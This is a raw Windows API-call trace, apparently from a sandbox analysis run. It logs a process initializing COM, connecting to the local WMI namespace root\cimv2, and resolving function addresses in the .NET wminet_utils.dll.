(in: This=0x133cdc0, riid=0x73b23e5c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8ace0a8 | out: pCid=0x8ace0a8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0163.696] WbemDefPath:IUnknown:Release (This=0x133cdc0) returned 0x3 [0163.696] CoGetContextToken (in: pToken=0x8ace100 | out: pToken=0x8ace100) returned 0x0 [0163.696] CoGetContextToken (in: pToken=0x8ace508 | out: pToken=0x8ace508) returned 0x0 [0163.696] WbemDefPath:IUnknown:QueryInterface (in: This=0x7a9ebd8, riid=0x73b502b4*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8ace594 | out: ppvObject=0x8ace594*=0x0) returned 0x80004002 [0163.696] WbemDefPath:IUnknown:Release (This=0x7a9ebd8) returned 0x2 [0163.696] WbemDefPath:IUnknown:Release (This=0x7a9ebd8) returned 0x1 [0163.697] SetEvent (hEvent=0x6f8) returned 1 Thread: id = 236 os_tid = 0x13e0 [0163.778] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0163.778] RoInitialize () returned 0x1 [0163.778] RoUninitialize () returned 0x0 [0163.779] IIDFromString (in: lpsz="{4590F811-1D3A-11D0-891F-00AA004B2E24}", lpiid=0x8b4f13c | out: lpiid=0x8b4f13c) returned 0x0 [0163.780] CoGetClassObject (in: rclsid=0x76d60dc*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x73b5b24c*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8b4ee48 | out: ppv=0x8b4ee48*=0x7655568) returned 0x0 [0163.788] WbemLocator:IUnknown:QueryInterface (in: This=0x7655568, riid=0x73ba9e44*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8b4f064 | out: ppvObject=0x8b4f064*=0x0) returned 0x80004002 [0163.788] WbemLocator:IClassFactory:CreateInstance (in: This=0x7655568, pUnkOuter=0x0, riid=0x73b23e5c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8b4f070 | out: ppvObject=0x8b4f070*=0x7aeb600) returned 0x0 [0163.788] WbemLocator:IUnknown:Release (This=0x7655568) returned 0x0 [0163.788] WbemLocator:IUnknown:QueryInterface (in: This=0x7aeb600, riid=0x73b23e5c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8b4ec94 | out: ppvObject=0x8b4ec94*=0x7aeb600) returned 0x0 [0163.789] WbemLocator:IUnknown:QueryInterface (in: This=0x7aeb600, riid=0x73b50328*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8b4ec50 | out: ppvObject=0x8b4ec50*=0x0) returned 0x80004002 [0163.789] WbemLocator:IUnknown:QueryInterface (in: This=0x7aeb600, riid=0x73b50490*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x8b4e844 | out: ppvObject=0x8b4e844*=0x0) returned 0x80004002 [0163.789] WbemLocator:IUnknown:AddRef (This=0x7aeb600) returned 0x3 [0163.789] WbemLocator:IUnknown:QueryInterface (in: This=0x7aeb600, riid=0x73b50074*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8b4e5a4 | out: ppvObject=0x8b4e5a4*=0x0) returned 0x80004002 [0163.789] WbemLocator:IUnknown:QueryInterface (in: This=0x7aeb600, riid=0x73b4ffc8*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8b4e554 | out: ppvObject=0x8b4e554*=0x0) returned 0x80004002 [0163.789] WbemLocator:IUnknown:QueryInterface (in: This=0x7aeb600, riid=0x73a97604*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8b4e560 | out: ppvObject=0x8b4e560*=0x0) returned 0x80004002 [0163.789] CoGetContextToken (in: pToken=0x8b4e5c0 | out: pToken=0x8b4e5c0) returned 0x0 [0163.790] CoGetObjectContext (in: riid=0x73b23e5c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x765556c | out: ppv=0x765556c*=0x12f9f70) returned 0x0 [0163.790] CoGetContextToken (in: pToken=0x8b4e9c8 | out: pToken=0x8b4e9c8) returned 0x0 [0163.790] WbemLocator:IUnknown:QueryInterface (in: This=0x7aeb600, riid=0x73b502b4*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8b4ea54 | out: ppvObject=0x8b4ea54*=0x0) returned 0x80004002 [0163.790] WbemLocator:IUnknown:Release (This=0x7aeb600) returned 0x2 [0163.790] WbemLocator:IUnknown:Release (This=0x7aeb600) returned 0x1 [0163.791] CoGetContextToken (in: pToken=0x8b4f050 | out: pToken=0x8b4f050) returned 0x0 [0163.791] CoGetContextToken (in: pToken=0x8b4efb0 | out: pToken=0x8b4efb0) returned 0x0 [0163.791] WbemLocator:IUnknown:QueryInterface (in: This=0x7aeb600, riid=0x8b4f080*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x8b4f07c | out: ppvObject=0x8b4f07c*=0x7aeb600) returned 0x0 [0163.791] WbemLocator:IUnknown:AddRef (This=0x7aeb600) returned 0x3 [0163.791] WbemLocator:IUnknown:Release (This=0x7aeb600) returned 0x2 [0163.791] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x7a9ebd8, puCount=0x8b4f218 | out: puCount=0x8b4f218*=0x2) returned 0x0 [0163.792] WbemDefPath:IWbemPath:GetText (in: This=0x7a9ebd8, lFlags=8, puBuffLength=0x8b4f214*=0x0, pszText=0x0 | out: puBuffLength=0x8b4f214*=0x17, pszText=0x0) returned 0x0 [0163.792] WbemDefPath:IWbemPath:GetText (in: This=0x7a9ebd8, lFlags=8, puBuffLength=0x8b4f214*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x8b4f214*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0163.801] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", nBufferLength=0x104, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", lpFilePart=0x0) returned 0x2e [0163.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\\\wminet_utils.dll", cchWideChar=63, lpMultiByteStr=0x8b4e968, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\\\wminet_utils.dll", lpUsedDefaultChar=0x0) returned 63 [0163.802] LoadLibraryA (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\\\wminet_utils.dll") returned 0x6e2a0000 [0163.846] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ResetSecurity", cchWideChar=13, lpMultiByteStr=0x8b4e99c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ResetSecurity5|kͶO¨ðù¦stì´\x08\x01", lpUsedDefaultChar=0x0) returned 13 [0163.846] GetProcAddress (hModule=0x6e2a0000, lpProcName="ResetSecurity") returned 0x6e2a7a70 [0163.865] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SetSecurity", cchWideChar=11, lpMultiByteStr=0x8b4e99c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetSecurity", lpUsedDefaultChar=0x0) returned 11 [0163.865] GetProcAddress (hModule=0x6e2a0000, lpProcName="SetSecurity") returned 0x6e2a7ac0 [0163.895] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BlessIWbemServices", cchWideChar=18, lpMultiByteStr=0x8b4e998, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BlessIWbemServices|kͶO¨ðù¦stì´\x08", lpUsedDefaultChar=0x0) returned 18 [0163.896] GetProcAddress (hModule=0x6e2a0000, lpProcName="BlessIWbemServices") returned 0x6e2a6b60 [0163.953] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BlessIWbemServicesObject", cchWideChar=24, lpMultiByteStr=0x8b4e990, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BlessIWbemServicesObject\x045|kͶO¨ðù¦stì´\x08", lpUsedDefaultChar=0x0) returned 24 [0163.954] GetProcAddress (hModule=0x6e2a0000, lpProcName="BlessIWbemServicesObject") returned 0x6e2a6bc0 [0164.064] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetPropertyHandle", cchWideChar=17, lpMultiByteStr=0x8b4e998, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetPropertyHandle5|kͶO¨ðù¦stì´\x08", lpUsedDefaultChar=0x0) returned 17 [0164.064] GetProcAddress (hModule=0x6e2a0000, lpProcName="GetPropertyHandle") returned 0x6e2a7500 [0164.090] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WritePropertyValue", cchWideChar=18, lpMultiByteStr=0x8b4e998, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WritePropertyValue|kͶO¨ðù¦stì´\x08", lpUsedDefaultChar=0x0) returned 18 [0164.091] GetProcAddress (hModule=0x6e2a0000, lpProcName="WritePropertyValue") returned 0x6e2a7c30 [0164.116] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Clone", cchWideChar=5, lpMultiByteStr=0x8b4e9a4, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Clone5|kͶO¨ðù¦stì´\x08", lpUsedDefaultChar=0x0) returned 5 [0164.117] GetProcAddress (hModule=0x6e2a0000, lpProcName="Clone") returned 0x6e2a6c20 [0164.135] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VerifyClientKey", cchWideChar=15, lpMultiByteStr=0x8b4e998, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VerifyClientKey", lpUsedDefaultChar=0x0) returned 15 [0164.136] GetProcAddress (hModule=0x6e2a0000, lpProcName="VerifyClientKey") returned 0x6e2a7bb0 [0164.175] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetQualifierSet", cchWideChar=15, lpMultiByteStr=0x8b4e998, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetQualifierSet", lpUsedDefaultChar=0x0) returned 15 [0164.176] GetProcAddress (hModule=0x6e2a0000, lpProcName="GetQualifierSet") returned 0x6e2a72c0 [0164.179] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Get", cchWideChar=3, lpMultiByteStr=0x8b4e9a4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Get", lpUsedDefaultChar=0x0) returned 3 [0164.179] GetProcAddress (hModule=0x6e2a0000, lpProcName="Get") returned 0x6e2a7290 [0164.217] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Put", cchWideChar=3, lpMultiByteStr=0x8b4e9a4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Put", lpUsedDefaultChar=0x0) returned 3 [0164.218] GetProcAddress (hModule=0x6e2a0000, lpProcName="Put") returned 0x6e2a76c0 [0164.249] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Delete", cchWideChar=6, lpMultiByteStr=0x8b4e9a4, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Delete|kͶO¨ðù¦stì´\x08", lpUsedDefaultChar=0x0) returned 6 [0164.249] GetProcAddress (hModule=0x6e2a0000, lpProcName="Delete") returned 0x6e2a6ff0 [0164.291] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetNames", cchWideChar=8, lpMultiByteStr=0x8b4e9a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetNames\x045|kͶO¨ðù¦stì´\x08", lpUsedDefaultChar=0x0) returned 8 [0164.291] GetProcAddress (hModule=0x6e2a0000, lpProcName="GetNames") returned 0x6e2a74a0 [0164.333] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BeginEnumeration", cchWideChar=16, lpMultiByteStr=0x8b4e998, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BeginEnumeration\x045|kͶO¨ðù¦stì´\x08", lpUsedDefaultChar=0x0) returned 16 [0164.333] GetProcAddress (hModule=0x6e2a0000, lpProcName="BeginEnumeration") returned 0x6e2a6b20 [0164.358] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Next", cchWideChar=4, lpMultiByteStr=0x8b4e9a4, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Next\x045|kͶO¨ðù¦stì´\x08", lpUsedDefaultChar=0x0) returned 4 [0164.358] GetProcAddress (hModule=0x6e2a0000, lpProcName="Next") returned 0x6e2a7660 [0164.395] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="EndEnumeration", cchWideChar=14, lpMultiByteStr=0x8b4e99c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EndEnumeration|kͶO¨ðù¦stì´\x08", lpUsedDefaultChar=0x0) returned 14 [0164.395] GetProcAddress (hModule=0x6e2a0000, lpProcName="EndEnumeration") returned 0x6e2a70b0 [0164.443] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetPropertyQualifierSet", cchWideChar=23, lpMultiByteStr=0x8b4e990, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetPropertyQualifierSet", lpUsedDefaultChar=0x0) returned 23 [0164.444] GetProcAddress (hModule=0x6e2a0000, lpProcName="GetPropertyQualifierSet") returned 0x6e2a7590 [0164.467] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Clone", cchWideChar=5, lpMultiByteStr=0x8b4e9a4, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Clone5|kͶO¨ðù¦stì´\x08", lpUsedDefaultChar=0x0) returned 5 [0164.467] GetProcAddress (hModule=0x6e2a0000, lpProcName="Clone") returned 0x6e2a6c20 [0164.467] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetObjectText", cchWideChar=13, lpMultiByteStr=0x8b4e99c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetObjectText5|kͶO¨ðù¦stì´\x08", lpUsedDefaultChar=0x0) returned 13 [0164.468] GetProcAddress (hModule=0x6e2a0000, lpProcName="GetObjectText") returned 0x6e2a74d0 [0164.497] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SpawnDerivedClass", cchWideChar=17, lpMultiByteStr=0x8b4e998, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SpawnDerivedClass5|kͶO¨ðù¦stì´\x08", lpUsedDefaultChar=0x0) returned 17 [0164.497] GetProcAddress (hModule=0x6e2a0000, lpProcName="SpawnDerivedClass") returned 0x6e2a7b10 [0164.524] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SpawnInstance", cchWideChar=13, lpMultiByteStr=0x8b4e99c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SpawnInstance5|kͶO¨ðù¦stì´\x08", lpUsedDefaultChar=0x0) returned 13 [0164.525] GetProcAddress (hModule=0x6e2a0000, lpProcName="SpawnInstance") returned 0x6e2a7b40 [0164.529] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CompareTo", cchWideChar=9, lpMultiByteStr=0x8b4e9a0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CompareTo5|kͶO¨ðù¦stì´\x08", lpUsedDefaultChar=0x0) returned 9 [0164.530] GetProcAddress (hModule=0x6e2a0000, lpProcName="CompareTo") returned 0x6e2a6d10 [0164.559] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetPropertyOrigin", cchWideChar=17, lpMultiByteStr=0x8b4e998, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetPropertyOrigin5|kͶO¨ðù¦stì´\x08", lpUsedDefaultChar=0x0) returned 17 [0164.559] GetProcAddress (hModule=0x6e2a0000, lpProcName="GetPropertyOrigin") returned 0x6e2a7560 [0164.606] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="InheritsFrom", cchWideChar=12, lpMultiByteStr=0x8b4e99c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InheritsFrom\x045|kͶO¨ðù¦stì´\x08", lpUsedDefaultChar=0x0) returned 12 [0164.607] GetProcAddress (hModule=0x6e2a0000, lpProcName="InheritsFrom") returned 0x6e2a75c0 [0164.609] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetMethod", cchWideChar=9, lpMultiByteStr=0x8b4e9a0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetMethod5|kͶO¨ðù¦stì´\x08", lpUsedDefaultChar=0x0) returned 9 [0164.610] GetProcAddress (hModule=0x6e2a0000, lpProcName="GetMethod") returned 0x6e2a7410 [0164.624] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PutMethod", cchWideChar=9, lpMultiByteStr=0x8b4e9a0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PutMethod5|kͶO¨ðù¦stì´\x08", lpUsedDefaultChar=0x0) returned 9 [0164.624] GetProcAddress (hModule=0x6e2a0000, lpProcName="PutMethod") returned 0x6e2a7890 [0164.696] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="DeleteMethod", cchWideChar=12, lpMultiByteStr=0x8b4e99c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DeleteMethod\x045|kͶO¨ðù¦stì´\x08", lpUsedDefaultChar=0x0) returned 12 [0164.696] GetProcAddress (hModule=0x6e2a0000, lpProcName="DeleteMethod") returned 0x6e2a7010 [0164.699] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BeginMethodEnumeration", cchWideChar=22, lpMultiByteStr=0x8b4e994, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BeginMethodEnumeration|kͶO¨ðù¦stì´\x08", lpUsedDefaultChar=0x0) returned 22 [0164.699] GetProcAddress (hModule=0x6e2a0000, lpProcName="BeginMethodEnumeration") returned 0x6e2a6b40 [0164.701] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NextMethod", cchWideChar=10, lpMultiByteStr=0x8b4e9a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NextMethod|kͶO¨ðù¦stì´\x08", lpUsedDefaultChar=0x0) returned 10 [0164.702] GetProcAddress (hModule=0x6e2a0000, lpProcName="NextMethod") returned 0x6e2a7690 [0164.730] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="EndMethodEnumeration", cchWideChar=20, lpMultiByteStr=0x8b4e994, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EndMethodEnumeration\x045|kͶO¨ðù¦stì´\x08", lpUsedDefaultChar=0x0) returned 20 [0164.730] GetProcAddress (hModule=0x6e2a0000, lpProcName="EndMethodEnumeration") returned 0x6e2a70d0 [0164.732] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetMethodQualifierSet", cchWideChar=21, lpMultiByteStr=0x8b4e994, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetMethodQualifierSet5|kͶO¨ðù¦stì´\x08", lpUsedDefaultChar=0x0) returned 21 [0164.732] GetProcAddress (hModule=0x6e2a0000, lpProcName="GetMethodQualifierSet") returned 0x6e2a7470 [0164.734] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetMethodOrigin", cchWideChar=15, lpMultiByteStr=0x8b4e998, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetMethodOrigin", lpUsedDefaultChar=0x0) returned 15 [0164.734] GetProcAddress (hModule=0x6e2a0000, lpProcName="GetMethodOrigin") returned 0x6e2a7440 [0164.735] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="QualifierSet_Get", cchWideChar=16, lpMultiByteStr=0x8b4e998, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QualifierSet_Get\x045|kͶO¨ðù¦stì´\x08", lpUsedDefaultChar=0x0) returned 16 [0164.735] GetProcAddress (hModule=0x6e2a0000, lpProcName="QualifierSet_Get") returned 0x6e2a7920 [0164.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="QualifierSet_Put", cchWideChar=16, lpMultiByteStr=0x8b4e998, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QualifierSet_Put\x045|kͶO¨ðù¦stì´\x08", lpUsedDefaultChar=0x0) returned 16 [0164.755] GetProcAddress (hModule=0x6e2a0000, lpProcName="QualifierSet_Put") returned 0x6e2a79b0 [0164.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="QualifierSet_Delete", cchWideChar=19, lpMultiByteStr=0x8b4e994, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QualifierSet_Delete", lpUsedDefaultChar=0x0) returned 19 [0164.761] GetProcAddress (hModule=0x6e2a0000, lpProcName="QualifierSet_Delete") returned 0x6e2a78e0 [0164.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="QualifierSet_GetNames", cchWideChar=21, lpMultiByteStr=0x8b4e994, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QualifierSet_GetNames5|kͶO¨ðù¦stì´\x08", lpUsedDefaultChar=0x0) returned 21 [0164.762] GetProcAddress (hModule=0x6e2a0000, lpProcName="QualifierSet_GetNames") returned 0x6e2a7950 [0164.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="QualifierSet_BeginEnumeration", cchWideChar=29, lpMultiByteStr=0x8b4e98c, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QualifierSet_BeginEnumeration5|kͶO¨ðù¦stì´\x08", lpUsedDefaultChar=0x0) returned 29 [0164.766] GetProcAddress (hModule=0x6e2a0000, lpProcName="QualifierSet_BeginEnumeration") returned 0x6e2a78c0 [0164.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="QualifierSet_Next", cchWideChar=17, lpMultiByteStr=0x8b4e998, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QualifierSet_Next5|kͶO¨ðù¦stì´\x08", lpUsedDefaultChar=0x0) returned 17 [0164.769] GetProcAddress (hModule=0x6e2a0000, lpProcName="QualifierSet_Next") returned 0x6e2a7980 [0164.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="QualifierSet_EndEnumeration", cchWideChar=27, lpMultiByteStr=0x8b4e98c, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QualifierSet_EndEnumeration", lpUsedDefaultChar=0x0) returned 27 [0164.817] GetProcAddress (hModule=0x6e2a0000, lpProcName="QualifierSet_EndEnumeration") returned 0x6e2a7900 [0164.821] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetCurrentApartmentType", cchWideChar=23, lpMultiByteStr=0x8b4e990, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetCurrentApartmentType", lpUsedDefaultChar=0x0) returned 23 [0164.821] GetProcAddress (hModule=0x6e2a0000, lpProcName="GetCurrentApartmentType") returned 0x6e2a72c0 [0164.843] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetDemultiplexedStub", cchWideChar=20, lpMultiByteStr=0x8b4e994, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetDemultiplexedStub\x045|kͶO¨ðù¦stì´\x08", lpUsedDefaultChar=0x0) returned 20 [0164.844] GetProcAddress (hModule=0x6e2a0000, lpProcName="GetDemultiplexedStub") returned 0x6e2a72e0 [0164.875] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateInstanceEnumWmi", cchWideChar=21, lpMultiByteStr=0x8b4e994, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateInstanceEnumWmi5|kͶO¨ðù¦stì´\x08", lpUsedDefaultChar=0x0) returned 21 [0164.875] GetProcAddress (hModule=0x6e2a0000, lpProcName="CreateInstanceEnumWmi") returned 0x6e2a6f20 [0165.051] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateClassEnumWmi", cchWideChar=18, lpMultiByteStr=0x8b4e998, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateClassEnumWmi|kͶO¨ðù¦stì´\x08", lpUsedDefaultChar=0x0) returned 18 [0165.051] GetProcAddress (hModule=0x6e2a0000, lpProcName="CreateClassEnumWmi") returned 0x6e2a6e50 [0165.066] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ExecQueryWmi", cchWideChar=12, lpMultiByteStr=0x8b4e99c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExecQueryWmi\x045|kͶO¨ðù¦stì´\x08", lpUsedDefaultChar=0x0) returned 12 [0165.066] GetProcAddress (hModule=0x6e2a0000, lpProcName="ExecQueryWmi") returned 0x6e2a71c0 